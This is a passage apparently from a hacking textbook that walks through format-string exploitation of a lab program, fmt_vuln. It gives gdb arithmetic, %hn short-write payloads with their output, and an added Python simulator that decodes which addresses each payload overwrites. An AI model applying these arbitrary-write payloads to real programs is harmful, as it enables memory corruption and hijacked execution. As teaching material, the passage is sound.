reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xfd72 - 8
$1 = 64874
(gdb) p 0xbfff - 0xfd72
$2 = -15731
(gdb) p 0x1bfff - 0xfd72
$3 = 49805
(gdb) quit
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08\x96\x97\x04\x08")%64874x%4\
$hn%49805x%5\$hn
The right way to print user-controlled input:
????%64874x%4$hn%49805x%5$hn
The wrong way to print user-controlled input:
b7fe75fc
[*] test_val @ 0x08049794 = -1073742478 0xbffffd72
reader@hacking:~/booksrc $
The preceding example used a similar wraparound method to deal with the second write of 0xbfff being less than the first write of 0xfd72. Using short writes, the order of the writes doesn't matter, so the first write can be 0xfd72 and the second 0xbfff, if the two passed addresses are swapped in position. In the output below, the address 0x08049796 is written to first, and 0x08049794 is written to second.
(gdb) p 0xbfff - 8
$1 = 49143
(gdb) p 0xfd72 - 0xbfff
$2 = 15731
(gdb) quit
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x97\x04\x08\x94\x97\x04\x08")%49143x%4\
$hn%15731x%5\$hn
The right way to print user-controlled input:
????%49143x%4$hn%15731x%5$hn
The wrong way to print user-controlled input:
????
b7fe75fc
[*] test_val @ 0x08049794 = -1073742478 0xbffffd72
reader@hacking:~/booksrc $
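To check the arithmetic in the two gdb sessions above and to decode what each %hn in the two command lines actually stores, here is an added Python example; it is not code from the book or from the fmt_vuln program. It assumes that a padded %x prints a 32-bit word of 8 hex digits (as b7fe75fc does in the output), that the eight address bytes in front of the format string count as eight literal bytes, and that positional arguments 4 and 5 correspond to the first and second 4-byte words of the buffer, as the two runs on the page show. The payload bytes themselves are the ones from the two command lines.

```python
import re
import struct

HN_MASK = 0xFFFF        # %hn stores the low 16 bits of printf's byte counter
N_MASK = 0xFFFFFFFF     # %n stores the full 32-bit counter
VALUE_LEN = 8           # assumption: a padded %x prints a 32-bit word, 8 hex digits

# The two command lines from the page: eight address bytes, then the format string.
PAYLOAD_FIRST = b"\x94\x97\x04\x08\x96\x97\x04\x08%64874x%4$hn%49805x%5$hn"
PAYLOAD_SWAPPED = b"\x96\x97\x04\x08\x94\x97\x04\x08%49143x%4$hn%15731x%5$hn"

TEST_VAL_ADDR = 0x08049794   # address of test_val, from the program's output


def short_write_widths(already_written, targets):
    """Field widths that make successive %hn conversions store `targets`.

    `already_written` is the number of bytes printed before the first padded
    %x (8 on this page: two 4-byte addresses). Each width is reduced modulo
    0x10000, which is the wraparound the text describes: %hn keeps only the
    low 16 bits of the counter, so a smaller second value is reached by
    counting past 0xffff rather than by printing fewer bytes.
    """
    widths = []
    count = already_written
    for target in targets:
        width = (target - count) % 0x10000
        if width < VALUE_LEN:
            # %x cannot print fewer bytes than the value itself; wrap once more
            width += 0x10000
        widths.append(width)
        count += width
    return widths


# Matches %<width>x and %<arg>$hn / %<arg>$n (also the non-positional %hn / %n).
SPEC = re.compile(rb"%(?:(?P<width>\d*)x|(?:(?P<arg>\d+)\$)?(?P<half>h?)n)")


def simulate_writes(payload, value_len=VALUE_LEN):
    """Walk a format string as printf would and record what each %n/%hn stores.

    Returns (writes, total_bytes). Each entry of `writes` is
    (positional argument or None, stored value), masked to the size of the
    conversion. Literal bytes count one each; each %x is assumed to emit
    max(field width, value_len) bytes.
    """
    count = 0
    pos = 0
    writes = []
    for m in SPEC.finditer(payload):
        count += m.start() - pos         # literal bytes before this conversion
        pos = m.end()
        if m.group("width") is not None:
            count += max(int(m.group("width") or b"0"), value_len)
        else:
            mask = HN_MASK if m.group("half") else N_MASK
            arg = m.group("arg")
            writes.append((int(arg) if arg else None, count & mask))
    count += len(payload) - pos          # trailing literal bytes
    return writes, count


def leading_addresses(payload, first_arg=4, count=2):
    """Map positional arguments to the little-endian words at the front of
    the payload (assumption from the page: the first word is argument 4, the
    second is argument 5)."""
    return {first_arg + i: struct.unpack_from("<I", payload, 4 * i)[0]
            for i in range(count)}


def reconstruct_word(writes, arg_addrs, base):
    """Assemble the 32-bit little-endian word at `base` from %hn writes.

    `arg_addrs` maps each positional argument to the address it holds; a write
    two bytes above `base` lands in the high half of the word.
    """
    word = 0
    for arg, value in writes:
        word |= value << (8 * (arg_addrs[arg] - base))
    return word & N_MASK


def to_signed32(word):
    """Interpret a 32-bit word as the signed int that fmt_vuln prints."""
    return word - 0x100000000 if word & 0x80000000 else word


if __name__ == "__main__":
    for payload in (PAYLOAD_FIRST, PAYLOAD_SWAPPED):
        writes, total = simulate_writes(payload)
        word = reconstruct_word(writes, leading_addresses(payload), TEST_VAL_ADDR)
        print(f"writes={[(a, hex(v)) for a, v in writes]} bytes={total} "
              f"test_val={to_signed32(word)} {word:#x}")
```

Running the script reproduces both sessions: the first payload stores 0xfd72 through argument 4 and 0xbfff through argument 5, the swapped payload stores them the other way round, and in both cases the two halfwords assemble to 0xbffffd72 at test_val. The same byte-counter walk is what an analyst uses to read a captured format string from a log and work out which addresses it would have written and with what values.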
The ability to overwrite arbitrary memory addresses implies the ability
to control the execution flow of the program. One option is to overwrite
the return address in the most recent stack frame, as was done with the
stack-based overflows. While this is a possible option, there are other targets
that have more predictable memory addresses. The nature of stack-based
overflows only allows the overwrite of the return address, but format strings
provide the ability to overwrite any memory address, which creates other
possibilities.